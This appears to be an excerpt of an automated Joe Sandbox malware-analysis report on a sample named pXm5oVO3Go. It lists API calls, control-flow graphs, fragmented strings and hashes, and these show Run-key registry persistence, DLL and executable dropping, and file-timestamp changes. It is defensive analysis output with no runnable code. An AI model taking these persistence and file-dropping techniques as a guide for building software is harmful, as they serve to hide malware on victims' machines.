                                  • Sleep.KERNEL32(000003E8,?,?,?,?,00000000,000000F1), ref: 10004C1E
                                    • Part of subcall function 100031C7: GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 100031EE
                                    • Part of subcall function 100031C7: _strrchr.LIBCMT ref: 100031FD
                                  • Sleep.KERNEL32(00000001,?,?,?,?,00000000,000000F1), ref: 10004C27
                                    • Part of subcall function 1000BCAF: _doexit.LIBCMT ref: 1000BCBB
                                  • RegOpenKeyExA.KERNEL32(80000001,1001A800,00000000,000F003F,?), ref: 10004C48
                                  • RegSetValueExA.KERNEL32(?,1001A830,00000000,00000001,?,?,?,?,?,?,00000000,000000F1), ref: 10004C7A
                                  • RegCloseKey.ADVAPI32(?,?,?,?,?,00000000,000000F1), ref: 10004C86
                                  • Sleep.KERNEL32(000003E8), ref: 10004C9C
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2609581253.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_10001000_pXm5oVO3Go.jbxd
                                  Similarity
                                  • API ID: _memset$Sleep$Open$Processwsprintf$CloseFileInitVariant$HandleToken_rand$H_prolog3___time64$AddressAtomCreateDebugExecuteFindGlobalLibraryLoadModuleNameOutputProcReadShellSizeStringValueWindow__mbstowcs_l_helper_doexit_mbstowcs_strcat_s_strrchr
                                  • String ID: (x8$%s%s$%s%s$%s.e$.exe$0SafeMonClass$2.l$6)\$A$BkSha$C:\P$CU\SOF$G_SZ /d "$Open$Q36$Shel$Shel$TWARE\Mic$am F$cef.dll$cute$d "HK$dll$dowWndClass$dows\Curr$entVe$ft\Win$g.e$iles$l32.$lExe$lalala123%$le:///$long$mo /t RE$rogr$roso$rsion\R$t3d.$t4d.$t5d.$text/$tmp$tmp$tmp$un" /v de$xe
                                  • API String ID: 2119807209-329007690
                                  • Opcode ID: c9c76253132aca2ab718f9d89e5fd2c160784e6ca4753814a731e3336da5125a
                                  • Instruction ID: dc6513a9a33df5a03291291388f4a278a9130dac831befe3f30b2f877d04dd66
                                  • Opcode Fuzzy Hash: c9c76253132aca2ab718f9d89e5fd2c160784e6ca4753814a731e3336da5125a
                                  • Instruction Fuzzy Hash: 14B2E27554C3C5AAE221DB60D841FABB7E9EFC4740F00482EF5C8CB291EAB199458B97

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 495 100092bd-100092f0 496 100092f2-100092f4 call 10008a54 495->496 497 100092f9-10009305 495->497 496->497 499 10009311-10009314 497->499 500 10009307-1000930c 497->500 502 10009323-10009328 499->502 503 10009316-1000931d call 10008487 499->503 501 100095f3-10009601 call 1000ad41 500->501 506 1000932a-10009336 call 100084bc 502->506 507 1000933e-10009359 call 10008bda 502->507 503->502 516 10009338 506->516 514 10009388-10009393 507->514 515 1000935b-1000935d 507->515 519 100093a3-100093a5 514->519 517 1000936d-10009370 515->517 518 1000935f-10009361 515->518 516->507 523 1000937a-10009383 call 1000916f 517->523 518->517 522 10009363-10009365 518->522 520 10009395-10009397 519->520 521 100093a7-100093be call 1000be5b 519->521 528 10009399-1000939b 520->528 529 1000939d 520->529 533 100093c4 521->533 534 1000945c-1000946f 521->534 525 10009372-10009379 522->525 526 10009367-1000936b 522->526 523->501 525->523 526->517 526->525 528->529 532 100093a0-100093a1 528->532 529->532 532->519 537 100093cb-10009452 call 1000cce0 * 2 call 1000b91d call 1000b560 533->537 535 10009471-10009478 534->535 536 10009494-100094bf call 1000ad50 call 1000916f 534->536 535->536 538 1000947a-10009481 535->538 548 100094ef-10009515 CreateFileA 536->548 559 100094c1 537->559 560 10009454-1000945a 537->560 538->537 541 10009487-1000948e 538->541 541->536 541->537 551 10009521-10009535 call 100086d0 548->551 552 10009517-1000951c 548->552 557 10009537-10009542 call 1000bd08 551->557 558 10009548 551->558 552->501 557->558 562 1000954e-1000956e call 10008829 558->562 563 100094c2-100094e0 call 1000ad50 call 1000916f 559->563 560->563 569 10009604-1000960e 562->569 570 10009574-10009576 562->570 575 100094e5-100094ed 563->575 572 100095b0-100095be call 10008a54 569->572 573 100095a6 570->573 574 10009578 570->574 582 100095c0-100095db SetFileTime 572->582 583 100095e1-100095ed CloseHandle 572->583 573->572 577 10009599-100095a0 574->577 578 1000957a-10009597 WriteFile 574->578 575->548 577->572 581 100095a2-100095a4 577->581 578->577 580 10009610-1000961a 578->580 580->572 581->562 581->573 582->583 583->501
                                  APIs
                                  • __fassign.LIBCMT ref: 100093B4
                                  • _memset.LIBCMT ref: 100093E8
                                  • _memset.LIBCMT ref: 1000940C
                                  • _strcat_s.LIBCMT ref: 10009427
                                  • _sprintf.LIBCMT ref: 100094A8
                                  • _sprintf.LIBCMT ref: 100094D0
                                  • CreateFileA.KERNEL32(00000000,40000000,00000000,00000000,00000002,?,00000000,?,?,?,?,?,?,00000010,?,00000001), ref: 10009506
                                  • WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,?,?,?,?,00000010,?,00000001), ref: 1000958F
                                  • SetFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000010,?,00000001), ref: 100095DB
                                  • CloseHandle.KERNEL32(?,?,?,?,?,?,?,00000010,?,00000001), ref: 100095E7
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2609581253.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_10001000_pXm5oVO3Go.jbxd
                                  Similarity
                                  • API ID: File$_memset_sprintf$CloseCreateHandleTimeWrite__fassign_strcat_s
                                  • String ID: %s%s$:$\$text.e
                                  • API String ID: 3001508280-2720340845
                                  • Opcode ID: 20582db583dc861384ad0e058ba716e76712ca215dfc85956af61f11d696da3b
                                  • Instruction ID: 73a716f2663df8b8e92aea41c103b71399f1627729841feff5178e0e12803359
                                  • Opcode Fuzzy Hash: 20582db583dc861384ad0e058ba716e76712ca215dfc85956af61f11d696da3b
                                  • Instruction Fuzzy Hash: CC91C171D00A289BFB61CB64CC85BDAB7B8EB09395F0001E6E618A7185D770AFC5CF90

                                  Control-flow Graph

                                  APIs
                                  • CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000004,00000080,00000000), ref: 10002D4B
                                  • _memset.LIBCMT ref: 10002D74
                                  • Sleep.KERNEL32(00000001), ref: 10002D94
                                  • _malloc.LIBCMT ref: 10002DCE
                                  • _memset.LIBCMT ref: 10002DFB
                                  • WriteFile.KERNEL32(?,00000000,1F400000,?,00000000), ref: 10002E13
                                  • _free.LIBCMT ref: 10002E1A
                                  • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 10002E42
                                  • FlushFileBuffers.KERNEL32(?), ref: 10002E4E
                                  • CloseHandle.KERNEL32(?), ref: 10002E5A
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2609581253.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_10001000_pXm5oVO3Go.jbxd
                                  Similarity
                                  • API ID: File$Write_memset$BuffersCloseCreateFlushHandleSleep_free_malloc
                                  • String ID: cef.dll$lib
                                  • API String ID: 1923221151-1944707463
                                  • Opcode ID: ca01e0c2fb6399795f82dae7e3f52f2be417b1a9fccd548e25d36cff5d7fbf62
                                  • Instruction ID: 95ace9bfcda8c33f9a2fbc6e56799451f67ef5c6450e70c67937a253407d00e2
                                  • Opcode Fuzzy Hash: ca01e0c2fb6399795f82dae7e3f52f2be417b1a9fccd548e25d36cff5d7fbf62
                                  • Instruction Fuzzy Hash: 3E31B17190022CAFEB25DF24CC85FEAB7B9EB19340F0041E5F688A6150DAB19FC58F50

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 610 100028b9-10002a3d call 10010ab0 call 1000cce0 * 3 624 10002a5f-10002adb 610->624 625 10002a3f-10002a40 610->625 639 10002ae3-10002aff 624->639 640 10002add-10002ade 624->640 626 10002a46-10002a50 625->626 632 10002a58-10002a5a 626->632 633 10002cfd-10002d0b call 1000ad41 632->633 639->640 643 10002b01-10002b22 call 1000aa9e call 1000cce0 639->643 640->626 648 10002b28-10002b4f 643->648 650 10002b51-10002b57 648->650 651 10002b59-10002b60 648->651 650->648 650->651 652 10002b62-10002b6e call 1000b8a1 651->652 653 10002b73-10002b7d 651->653 652->640 654 10002b8c-10002b90 653->654 655 10002b7f-10002b8a 653->655 657 10002b96-10002ba0 call 1000aa9e 654->657 658 10002c8d-10002cdd CreateFileA WriteFile FlushFileBuffers CloseHandle call 1000b8a1 654->658 655->652 655->654 663 10002ba5-10002bd9 call 10013660 call 10002887 657->663 662 10002ce2-10002cfb 658->662 662->633 670 10002bdb 663->670 671 10002bff 663->671 674 10002bdd-10002be9 670->674 672 10002c02-10002c05 671->672 672->632 675 10002c0b-10002c14 672->675 676 10002bf1-10002bf4 674->676 677 10002beb-10002bef 674->677 678 10002c1a-10002c1f 675->678 676->672 679 10002bf6-10002bfd 676->679 677->674 677->676 678->678 680 10002c21-10002c45 call 1000cce0 678->680 679->670 679->671 683 10002c48-10002c4d 680->683 683->683 684 10002c4f-10002c8a call 10013660 call 10002887 call 10013660 683->684 684->658
                                  APIs
                                  • _memset.LIBCMT ref: 10002908
                                  • _memset.LIBCMT ref: 1000291A
                                  • _memset.LIBCMT ref: 10002929
                                  • _memset.LIBCMT ref: 10002B1A
                                  • _memset.LIBCMT ref: 10002C37
                                  • CreateFileA.KERNEL32(?,C0000000,00000001,00000000,00000004,00000001,00000000), ref: 10002CA0
                                  • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 10002CC3
                                  • FlushFileBuffers.KERNEL32(00000000), ref: 10002CCA
                                  • CloseHandle.KERNEL32(00000000), ref: 10002CD1
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2609581253.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_10001000_pXm5oVO3Go.jbxd
                                  Similarity
                                  • API ID: _memset$File$BuffersCloseCreateFlushHandleWrite
                                  • String ID: <
                                  • API String ID: 2144675991-4251816714
                                  • Opcode ID: 7483a2a04af1c0fb4a5dd35ee18b4b198e80d501588293fbf89c89882791b19e
                                  • Instruction ID: a1f269842447a9dcddcd4be163bf2b0c8b7a3912157e6269aeea71cf59aacecc
                                  • Opcode Fuzzy Hash: 7483a2a04af1c0fb4a5dd35ee18b4b198e80d501588293fbf89c89882791b19e
                                  • Instruction Fuzzy Hash: D5C1CB76900228AFEB21DF648C85DEABBFDEB09394F14C1E6F509A2150DB319F858F54

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 691 54d874-54d895 EnterCriticalSection 692 54d8a4-54d8a9 691->692 693 54d897-54d89e 691->693 695 54d8c6-54d8ce 692->695 696 54d8ab-54d8ae 692->696 693->692 694 54d962-54d965 693->694 698 54d967-54d96a 694->698 699 54d96d-54d98b LeaveCriticalSection 694->699 700 54d8e5-54d909 GlobalHandle GlobalUnlock call 53751a GlobalReAlloc 695->700 701 54d8d0-54d8e3 call 53751a GlobalAlloc 695->701 697 54d8b1-54d8b4 696->697 704 54d8b6-54d8bc 697->704 705 54d8be-54d8c0 697->705 698->699 708 54d90f-54d911 700->708 701->708 704->697 704->705 705->694 705->695 709 54d936-54d95f GlobalLock call 63c6d0 708->709 710 54d913-54d918 708->710 709->694 711 54d928-54d931 LeaveCriticalSection call 538190 710->711 712 54d91a-54d922 GlobalHandle GlobalLock 710->712 711->709 712->711
                                  APIs
                                  • EnterCriticalSection.KERNEL32(0073A27C,?,?,?,0073A260,0073A260,?,0054DCAF,00000004,00544579,005381E4,005382F8,0040E0F1), ref: 0054D887
                                  • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,0073A260,0073A260,?,0054DCAF,00000004,00544579,005381E4,005382F8,0040E0F1), ref: 0054D8DD
                                  • GlobalHandle.KERNEL32(007A9040), ref: 0054D8E6
                                  • GlobalUnlock.KERNEL32(00000000,?,?,?,0073A260,0073A260,?,0054DCAF,00000004,00544579,005381E4,005382F8,0040E0F1), ref: 0054D8F0
                                  • GlobalReAlloc.KERNEL32(00000000,00000000,00002002), ref: 0054D909
                                  • GlobalHandle.KERNEL32(007A9040), ref: 0054D91B
                                  • GlobalLock.KERNEL32(00000000,?,?,?,0073A260,0073A260,?,0054DCAF,00000004,00544579,005381E4,005382F8,0040E0F1), ref: 0054D922
                                  • LeaveCriticalSection.KERNEL32(00000000,?,?,?,0073A260,0073A260,?,0054DCAF,00000004,00544579,005381E4,005382F8,0040E0F1), ref: 0054D92B
                                  • GlobalLock.KERNEL32(00000000,?,?,?,0073A260,0073A260,?,0054DCAF,00000004,00544579,005381E4,005382F8,0040E0F1), ref: 0054D937
                                  • _memset.LIBCMT ref: 0054D951
                                  • LeaveCriticalSection.KERNEL32(00000000,ED2F953D), ref: 0054D97F
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2607518247.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2607494184.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607770311.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607852468.0000000000724000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607881728.000000000072E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607918058.0000000000735000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607945972.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607972734.0000000000741000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_pXm5oVO3Go.jbxd
                                  Similarity
                                  • API ID: Global$CriticalSection$AllocHandleLeaveLock$EnterUnlock_memset
                                  • String ID:
                                  • API String ID: 496899490-0
                                  • Opcode ID: 701c7f80717766588c49cf9b396544a02917dc2281a66726b9c9399b8a32ba4c
                                  • Instruction ID: 4fc896e0dd397aeb12eaef14b211f37fd946bb1472f086b6f8352429243eca4a
                                  • Opcode Fuzzy Hash: 701c7f80717766588c49cf9b396544a02917dc2281a66726b9c9399b8a32ba4c
                                  • Instruction Fuzzy Hash: 9B31AF71A00706AFD7249F74CC8DA9ABBFAFF84704F014929F556D7260EB31E9408B60

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 716 1000916f-1000918c 717 100091ee-100091f2 716->717 718 1000918e-100091a9 call 1000be5b 716->718 719 100091f8-100091fb 717->719 720 100092af-100092bc call 1000ad41 717->720 725 100091ac-100091b1 718->725 722 100091fd-100091ff 719->722 726 10009201-10009203 722->726 727 10009205 722->727 725->725 729 100091b3-100091b5 725->729 726->727 730 10009207-1000920c 726->730 727->730 731 100091b7-100091c3 729->731 732 100091cd-100091dd GetFileAttributesA 729->732 730->722 733 1000920e-10009210 730->733 734 100091c5-100091c8 731->734 735 100091ca 731->735 732->717 736 100091df-100091e8 CreateDirectoryA 732->736 737 10009212-10009237 call 10013660 call 1000916f 733->737 738 1000923a-10009244 733->738 734->732 734->735 735->732 736->717 737->738 739 10009246-10009258 call 1000be5b 738->739 740 1000925b-10009265 738->740 739->740 744 10009268-1000926d 740->744 744->744 747 1000926f-1000929e call 1000be5b GetFileAttributesA 744->747 747->720 751 100092a0-100092a9 CreateDirectoryA 747->751 751->720
                                  APIs
                                  • GetFileAttributesA.KERNEL32(?,?,0000000D,?), ref: 100091D4
                                  • CreateDirectoryA.KERNEL32(?,00000000,?,0000000D,?), ref: 100091E8
                                  • __fassign.LIBCMT ref: 1000919B
                                    • Part of subcall function 1000BE5B: __mbsnbcpy_l.LIBCMT ref: 1000BE6B
                                  • __fassign.LIBCMT ref: 10009253
                                  • __fassign.LIBCMT ref: 10009282
                                  • GetFileAttributesA.KERNEL32(00000000,?,0000000D,?), ref: 10009295
                                  • CreateDirectoryA.KERNEL32(00000000,00000000,?,0000000D,?), ref: 100092A9
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2609581253.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_10001000_pXm5oVO3Go.jbxd
                                  Similarity
                                  • API ID: __fassign$AttributesCreateDirectoryFile$__mbsnbcpy_l
                                  • String ID:
                                  • API String ID: 2854908881-0
                                  • Opcode ID: 19ae208bd58dd0a62daa5c8630e2a55888f4f76b224036dc7dc1bf30700462e9
                                  • Instruction ID: 5956e6d2c7f77d4cc5354552260656b707d8c1af4a1ca73f2dd12bb7e3efa789
                                  • Opcode Fuzzy Hash: 19ae208bd58dd0a62daa5c8630e2a55888f4f76b224036dc7dc1bf30700462e9
                                  • Instruction Fuzzy Hash: 5F4115B590428D6BEB50CB68CC88BEA7BEDDB05380F5101E5E994D3186DA709F88CB61

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 752 1000a063-1000a0ba call 100142a0 call 1000a49f 757 1000a0bc 752->757 758 1000a0bf-1000a0c5 752->758 757->758 759 1000a0c7 758->759 760 1000a0ca-1000a0dd call 1000961c 758->760 759->760 763 1000a10d-1000a11a 760->763 764 1000a0df-1000a0e5 760->764 767 1000a11c 763->767 768 1000a11f-1000a122 763->768 765 1000a0e7 764->765 766 1000a0ea-1000a0f0 764->766 765->766 769 1000a0f2 766->769 770 1000a0f5-1000a108 wsprintfA 766->770 767->768 771 1000a124 768->771 772 1000a14e-1000a15e call 10008b91 768->772 769->770 774 1000a42c-1000a42f 770->774 775 1000a12e 771->775 772->775 780 1000a160-1000a172 call 100096c5 772->780 777 1000a431 774->777 778 1000a434-1000a49e OutputDebugStringA call 1000a566 call 10005af7 call 10005b32 call 10005af7 * 5 call 100142ea 774->778 779 1000a134-1000a13c 775->779 777->778 782 1000a400 call 10009f6b 779->782 783 1000a142-1000a143 call 1000972f 779->783 780->775 794 1000a174-1000a188 780->794 791 1000a405-1000a40c 782->791 790 1000a148-1000a149 783->790 790->791 792 1000a411-1000a428 wsprintfA 791->792 793 1000a40e 791->793 792->774 793->792 794->779 796 1000a18a-1000a1b9 call 1000b7e4 call 100096c5 794->796 806 1000a1c1-1000a1e7 call 10009fac 796->806 807 1000a1bb 796->807 814 1000a3f6-1000a3fb call 1000aa30 806->814 815 1000a1ed-1000a2b2 call 100059cb call 1000a4c9 call 1000a520 call 1000a605 call 10005af7 call 1000a520 call 1000a605 call 10005af7 806->815 807->806 814->782 838 1000a2b4 815->838 839 1000a2b7-1000a2bd 815->839 838->839 840 1000a2c2-1000a2c6 839->840 841 1000a2bf 839->841 842 1000a2e2-1000a2e4 840->842 843 1000a2c8-1000a2ca 840->843 841->840 846 1000a2e7-1000a2e9 842->846 844 1000a2cc-1000a2d2 843->844 845 1000a2de-1000a2e0 843->845 844->842 847 1000a2d4-1000a2dc 844->847 845->846 848 1000a385-1000a3b1 call 10005af7 * 3 846->848 849 1000a2ef-1000a2f2 846->849 847->840 847->845 865 1000a3b3-1000a3be call 1000b8df 848->865 866 1000a3bf-1000a3eb 848->866 849->848 851 1000a2f8-1000a2fe 849->851 853 1000a300 851->853 854 1000a303-1000a32c call 100059cb call 1000a59a 851->854 853->854 863 1000a331-1000a337 854->863 864 1000a32e 854->864 867 1000a339 863->867 868 1000a33c-1000a349 call 10009700 863->868 864->863 865->866 866->796 870 1000a3f1 866->870 867->868 873 1000a34e-1000a352 868->873 870->779 874 1000a354-1000a359 873->874 875 1000a377-1000a380 call 10005af7 873->875 874->875 876 1000a35b-1000a360 874->876 875->848 876->875 878 1000a362-1000a367 876->878 878->875 879 1000a369-1000a36e 878->879 879->875 880 1000a370 879->880 880->875
                                  APIs
                                  • __EH_prolog3_GS.LIBCMT ref: 1000A06D
                                  • wsprintfA.USER32 ref: 1000A0FC
                                  • wsprintfA.USER32 ref: 1000A41F
                                    • Part of subcall function 10008B91: __fassign.LIBCMT ref: 10008BA4
                                  • _wprintf.LIBCMT ref: 1000A19B
                                  • std::_Xinvalid_argument.LIBCPMT ref: 1000A3FB
                                  • OutputDebugStringA.KERNEL32(?,?,?,?,?,?,10017380,000000FF), ref: 1000A435
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2609581253.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_10001000_pXm5oVO3Go.jbxd
                                  Similarity
                                  • API ID: wsprintf$DebugH_prolog3_OutputStringXinvalid_argument__fassign_wprintfstd::_
                                  • String ID:
                                  • API String ID: 2279894289-0
                                  • Opcode ID: 5e606e6aa0a05db95cc5d0c86f9264e9bc89a53203d1eaa0600f78d532f15940
                                  • Instruction ID: 15dd9eba096bb05e6903e10c230cd1e13f32cb1ae0f886c9acc3da2af926b47a
                                  • Opcode Fuzzy Hash: 5e606e6aa0a05db95cc5d0c86f9264e9bc89a53203d1eaa0600f78d532f15940
                                  • Instruction Fuzzy Hash: D9C16A7590425D9BEF12CFA4CC81ADDBBB8EF0A380F5142AAE909A7145D770AF85CF41

                                  Control-flow Graph

                                  APIs
                                  • _malloc.LIBCMT ref: 1000BD22
                                    • Part of subcall function 1000B4CB: __FF_MSGBANNER.LIBCMT ref: 1000B4E4
                                    • Part of subcall function 1000B4CB: __NMSG_WRITE.LIBCMT ref: 1000B4EB
                                    • Part of subcall function 1000B4CB: RtlAllocateHeap.NTDLL(00000000,00000001,00000001), ref: 1000B510
                                  • std::exception::exception.LIBCMT ref: 1000BD57
                                  • std::exception::exception.LIBCMT ref: 1000BD71
                                  • __CxxThrowException@8.LIBCMT ref: 1000BD82
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2609581253.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_10001000_pXm5oVO3Go.jbxd
                                  Similarity
                                  • API ID: std::exception::exception$AllocateException@8HeapThrow_malloc
                                  • String ID:
                                  • API String ID: 615853336-0
                                  • Opcode ID: d95f4789413638b91aa84ecef32e181d789e58a5d6bfa65bce0fdfdeccd2f804
                                  • Instruction ID: bd7f334f1e932a3e7b8b1a8aa2d400e353e82d7f1e8fab280da3017615532154
                                  • Opcode Fuzzy Hash: d95f4789413638b91aa84ecef32e181d789e58a5d6bfa65bce0fdfdeccd2f804
                                  • Instruction Fuzzy Hash: 5FF02838400A5EABFB04DF54CC42DED7BA5EB002D0F60052AF814EA0A5DF74EB868740

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1045 427ff0-42805a call 63c6d0 call 53746d 1050 428066-428090 call 53746d 1045->1050 1051 42805c-428061 call 40e4a0 1045->1051 1056 428092-428097 call 40e4a0 1050->1056 1057 42809c-4280cd GetModuleFileNameW 1050->1057 1051->1050 1056->1057 1060 4280d0-4280d9 1057->1060 1060->1060 1061 4280db-428105 call 40e360 call 63b30a 1060->1061 1066 428107-42810a 1061->1066 1067 42810c-42810e 1061->1067 1068 428110-42811f call 419560 1066->1068 1067->1068 1070 428124-42814a call 40dbb0 1068->1070 1073 428156-428169 1070->1073 1074 42814c-428151 1070->1074 1075 428175-428191 call 6388f0 1073->1075 1076 42816b-428170 1073->1076 1074->1073 1076->1075
                                  APIs
                                  • _memset.LIBCMT ref: 00428044
                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000104,?,00000000), ref: 004280BE
                                  • _wcsrchr.LIBCMT ref: 004280FB
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2607518247.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2607494184.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607770311.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607852468.0000000000724000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607881728.000000000072E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607918058.0000000000735000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607945972.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607972734.0000000000741000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_pXm5oVO3Go.jbxd
                                  Similarity
                                  • API ID: FileModuleName_memset_wcsrchr
                                  • String ID:
                                  • API String ID: 3263482925-0
                                  • Opcode ID: 38174b6fb003b41db8f6ad2ddeb13373319d99544d60a7c3dd40589232e91f64
                                  • Instruction ID: f5fdb4711c5cb80a5300a3031eb21cdb5188b502cb2df1d3aaf1cf00cc93d5ea
                                  • Opcode Fuzzy Hash: 38174b6fb003b41db8f6ad2ddeb13373319d99544d60a7c3dd40589232e91f64
                                  • Instruction Fuzzy Hash: 3741E571A002199FDB14DF68CC85BAEB7B8FF54314F1482AEE419E7291DB34AE458B84

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1079 100086d0-100086de 1080 100086e0 1079->1080 1081 100086e8-100086eb 1079->1081 1082 100086e2-100086e3 1080->1082 1081->1080 1083 100086ed-100086f0 1081->1083 1084 10008825-10008828 1082->1084 1085 100086f2-100086f7 call 10008a54 1083->1085 1086 100086f9-10008710 call 1000850d 1083->1086 1085->1086 1091 10008712-10008714 1086->1091 1092 10008716-10008726 call 1000b4cb 1086->1092 1091->1082 1095 10008728-10008746 call 1000b4cb 1092->1095 1096 1000874f-10008752 1092->1096 1100 10008757-10008781 1095->1100 1101 10008748-1000874e call 1000b491 1095->1101 1098 10008824 1096->1098 1098->1084 1103 100087a1-100087bd 1100->1103 1104 10008783-1000878f call 10007966 1100->1104 1101->1096 1105 100087c4 1103->1105 1106 100087bf-100087c2 1103->1106 1110 10008794-10008798 1104->1110 1109 100087c7-100087fa 1105->1109 1106->1109 1112 100087fc-10008803 1109->1112 1113 1000880f-10008822 1109->1113 1110->1103 1111 1000879a 1110->1111 1111->1103 1112->1113 1114 10008805-1000880d call 10007759 1112->1114 1113->1098 1114->1112 1114->1113
                                  APIs
                                  • _malloc.LIBCMT ref: 1000871C
                                    • Part of subcall function 1000B4CB: __FF_MSGBANNER.LIBCMT ref: 1000B4E4
                                    • Part of subcall function 1000B4CB: __NMSG_WRITE.LIBCMT ref: 1000B4EB
                                    • Part of subcall function 1000B4CB: RtlAllocateHeap.NTDLL(00000000,00000001,00000001), ref: 1000B510
                                  • _malloc.LIBCMT ref: 1000872D
                                  • _free.LIBCMT ref: 10008749
                                    • Part of subcall function 1000B491: RtlFreeHeap.NTDLL(00000000,00000000,?,1000B064,?,?,1000101C), ref: 1000B4A7
                                    • Part of subcall function 1000B491: GetLastError.KERNEL32(?,?,1000B064,?,?,1000101C), ref: 1000B4B9
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2609581253.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_10001000_pXm5oVO3Go.jbxd
                                  Similarity
                                  • API ID: Heap_malloc$AllocateErrorFreeLast_free
                                  • String ID:
                                  • API String ID: 916394080-0
                                  • Opcode ID: 9ff5967c5a77d9676775b1c5cc29b0c5f39e43de9f44d53c9d09c373247b1173
                                  • Instruction ID: a00e60491e46dfd1ee58bbd4593486312fc2ca9a753c64ce6e520688288dc10f
                                  • Opcode Fuzzy Hash: 9ff5967c5a77d9676775b1c5cc29b0c5f39e43de9f44d53c9d09c373247b1173
                                  • Instruction Fuzzy Hash: 70415B75A04656EFEB55CF68C480598BBF8FF08780720419AE999DB74AD730EA50CFD0

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1117 10007fb6-10007fcf call 10007e17 1120 10007fd1-10007fd4 1117->1120 1121 10007fd9-10007fdc 1117->1121 1122 100080e3-100080e6 1120->1122 1123 10007fde-10007fe2 1121->1123 1124 10007fff 1121->1124 1126 10007fe4-10007ff7 SetFilePointer 1123->1126 1127 10007ff9-10007ffd 1123->1127 1125 10008002 1124->1125 1128 10008005-10008012 1125->1128 1126->1125 1127->1128 1129 10008014 1128->1129 1130 10008017-10008029 call 1000b4cb 1128->1130 1129->1130 1133 10008033-1000803d 1130->1133 1134 1000802b-1000802e 1130->1134 1136 10008043 1133->1136 1137 100080d6-100080e1 call 1000b491 1133->1137 1135 100080e2 1134->1135 1135->1122 1139 1000804d-1000805a 1136->1139 1137->1135 1141 1000805c 1139->1141 1142 1000805f-1000806b 1139->1142 1141->1142 1143 1000806d 1142->1143 1144 1000806f-1000807d call 10007e17 1142->1144 1143->1144 1144->1137 1147 1000807f-10008088 call 10007e76 1144->1147 1149 1000808d-10008093 1147->1149 1149->1137 1150 10008095-10008098 1149->1150 1151 100080b9-100080bb 1150->1151 1152 1000809a-100080a2 1151->1152 1153 100080bd 1151->1153 1152->1151 1154 100080a4-100080a9 1152->1154 1155 100080c4-100080c8 1153->1155 1154->1151 1156 100080ab-100080b0 1154->1156 1155->1137 1157 100080ca-100080d0 